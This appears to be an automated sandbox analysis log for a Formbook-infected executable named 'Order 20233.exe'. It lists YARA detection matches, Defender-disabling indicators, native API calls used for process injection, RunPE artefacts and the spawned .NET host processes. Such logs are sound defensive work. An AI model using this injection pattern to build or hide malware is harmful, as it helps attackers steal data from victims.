Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: AddInProcess32.exe PID: 4392, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: mstsc.exe PID: 5380, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Order 20233.exe

.NET source code contains very large strings

Source: Order 20233.exe, moabGi8lf8iend/moabGu5ss.cs

Long String: Length: 602136

Source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: AddInProcess32.exe PID: 4392, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: mstsc.exe PID: 5380, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD3854F8	0_2_00007FFBAD3854F8
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD3830A0	0_2_00007FFBAD3830A0
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD3830B0	0_2_00007FFBAD3830B0
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD3948D9	0_2_00007FFBAD3948D9
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD38A969	0_2_00007FFBAD38A969
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD385588	0_2_00007FFBAD385588
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD38BD36	0_2_00007FFBAD38BD36
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD382FD0	0_2_00007FFBAD382FD0
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD38D285	0_2_00007FFBAD38D285
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD3854F0	0_2_00007FFBAD3854F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185F900	17_2_0185F900
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01874120	17_2_01874120
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186B090	17_2_0186B090
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018820A0	17_2_018820A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019220A8	17_2_019220A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019228EC	17_2_019228EC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911002	17_2_01911002
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0192E824	17_2_0192E824
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188EBB0	17_2_0188EBB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191DBD2	17_2_0191DBD2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019103DA	17_2_019103DA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01922B28	17_2_01922B28
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187AB40	17_2_0187AB40
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019222AE	17_2_019222AE
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0190FA2B	17_2_0190FA2B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01882581	17_2_01882581
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019225DD	17_2_019225DD
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186D5E0	17_2_0186D5E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01922D07	17_2_01922D07
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01850D20	17_2_01850D20
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01921D55	17_2_01921D55
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186841F	17_2_0186841F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191D466	17_2_0191D466
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0192DFCE	17_2_0192DFCE
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01921FF1	17_2_01921FF1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01922EF7	17_2_01922EF7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191D616	17_2_0191D616
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01876E30	17_2_01876E30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004012A7	17_2_004012A7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004223E6	17_2_004223E6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0040B443	17_2_0040B443
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0040B447	17_2_0040B447
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004044C0	17_2_004044C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004044C7	17_2_004044C7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0040FE77	17_2_0040FE77
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004046E7	17_2_004046E7

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: String function: 0185B150 appears 45 times

Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD39A0AD NtResumeThread,	0_2_00007FFBAD39A0AD
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD399F90 NtWriteVirtualMemory,	0_2_00007FFBAD399F90
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD39A538 NtResumeThread,	0_2_00007FFBAD39A538
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018999A0 NtCreateSection,LdrInitializeThunk,	17_2_018999A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_01899910
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018998F0 NtReadVirtualMemory,LdrInitializeThunk,	17_2_018998F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899840 NtDelayExecution,LdrInitializeThunk,	17_2_01899840
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_01899860
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899A00 NtProtectVirtualMemory,LdrInitializeThunk,	17_2_01899A00
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899A20 NtResumeThread,LdrInitializeThunk,	17_2_01899A20
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899A50 NtCreateFile,LdrInitializeThunk,	17_2_01899A50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018995D0 NtClose,LdrInitializeThunk,	17_2_018995D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899540 NtReadFile,LdrInitializeThunk,	17_2_01899540
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899780 NtMapViewOfSection,LdrInitializeThunk,	17_2_01899780
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018997A0 NtUnmapViewOfSection,LdrInitializeThunk,	17_2_018997A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899FE0 NtCreateMutant,LdrInitializeThunk,	17_2_01899FE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899710 NtQueryInformationToken,LdrInitializeThunk,	17_2_01899710
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018996E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_018996E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_01899660
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018999D0 NtCreateProcessEx,	17_2_018999D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899950 NtQueueApcThread,	17_2_01899950
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018998A0 NtWriteVirtualMemory,	17_2_018998A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899820 NtEnumerateKey,	17_2_01899820
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0189B040 NtSuspendThread,	17_2_0189B040
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0189A3B0 NtGetContextThread,	17_2_0189A3B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899B00 NtSetValueKey,	17_2_01899B00
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899A80 NtOpenDirectoryObject,	17_2_01899A80
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899A10 NtQuerySection,	17_2_01899A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018995F0 NtQueryInformationFile,	17_2_018995F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899520 NtWaitForSingleObject,	17_2_01899520
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0189AD30 NtSetContextThread,	17_2_0189AD30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899560 NtWriteFile,	17_2_01899560
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0189A710 NtOpenProcessToken,	17_2_0189A710
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899730 NtQueryVirtualMemory,	17_2_01899730
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899760 NtOpenProcess,	17_2_01899760
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0189A770 NtOpenThread,	17_2_0189A770
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899770 NtSetInformationFile,	17_2_01899770
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018996D0 NtCreateKey,	17_2_018996D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899610 NtEnumerateValueKey,	17_2_01899610
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899650 NtQueryValueKey,	17_2_01899650
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01899670 NtQueryInformationProcess,	17_2_01899670
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041E097 NtAllocateVirtualMemory,	17_2_0041E097
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004012A7 NtProtectVirtualMemory,	17_2_004012A7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041DEB7 NtCreateFile,	17_2_0041DEB7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041DF67 NtReadFile,	17_2_0041DF67
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041DFE7 NtClose,	17_2_0041DFE7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041E091 NtAllocateVirtualMemory,	17_2_0041E091
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004014E9 NtProtectVirtualMemory,	17_2_004014E9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041DEB1 NtCreateFile,	17_2_0041DEB1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041DFE2 NtClose,	17_2_0041DFE2

Source: Order 20233.exe

Static PE information: No import functions for PE file found

Source: Order 20233.exe, 00000000.00000002.316784972.00000217728BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Order 20233.exe
Source: Order 20233.exe, 00000000.00000002.317830281.00000217742B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRunpeX.Stub.Framework.exeL vs Order 20233.exe
Source: Order 20233.exe, 00000000.00000002.312683792.0000021710011000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRunpeX.Stub.Framework.exeL vs Order 20233.exe
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprocexp.SysB vs Order 20233.exe

Source: Order 20233.exe	ReversingLabs: Detection: 51%
Source: Order 20233.exe	Virustotal: Detection: 40%

Source: Order 20233.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Order 20233.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Order 20233.exe C:\Users\user\Desktop\Order 20233.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe	Jump to behavior
